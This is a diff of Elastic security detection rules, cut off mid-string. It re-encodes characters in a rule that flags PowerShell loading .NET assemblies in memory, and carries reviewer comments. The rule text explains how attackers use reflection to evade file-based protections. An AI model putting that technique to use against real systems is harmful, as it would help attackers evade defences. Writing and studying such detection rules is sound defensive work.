 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json
index dcaeebdb01e..816ed4a67f3 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json
@@ -31,7 +31,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -46,7 +46,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json
index ebc6d76a032..95d541d2b72 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json
@@ -45,7 +45,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -60,7 +60,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json
index 06e8e9765ff..8f029e1c428 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load"
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
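Review bot: The re-encoded `setup` string on the `+` line keeps the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; since this string is being rewritten anyway, dropping one `with` would stop the typo from shipping in the published setup guide. The identical `setup` hunk recurs for the `_106`, `_107` and `_108` files later in this diff, so the fix applies there too. The guide could also tell the operator that the rule matches on `powershell.file.script_block_text`, so the PowerShell Operational log has to be shipped to the stack in addition to enabling the policy — I am inferring that requirement from the query, so confirm it against the integration's data streams before wording it.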
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json
index d350701aaed..afca31b4af3 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load"
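Review bot: The new `note` text closes its investigation steps with `searching for login events (for example, 4624) to the target host after the registry modification`, but this rule triggers on `[Reflection.Assembly]::Load` in script block text and has no registry component, so the phrase reads as carried over from a registry-based rule's guide; `after the suspicious PowerShell execution` would match what the analyst actually has in hand. The same sentence appears in the corresponding `note` hunk of the `_107` file below and in the `_105` note earlier in this diff, so it should be corrected in all versions at once. This is a wording fix only and does not change what the rule detects.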
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json
index 3d5f5340abb..b03b684109a 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
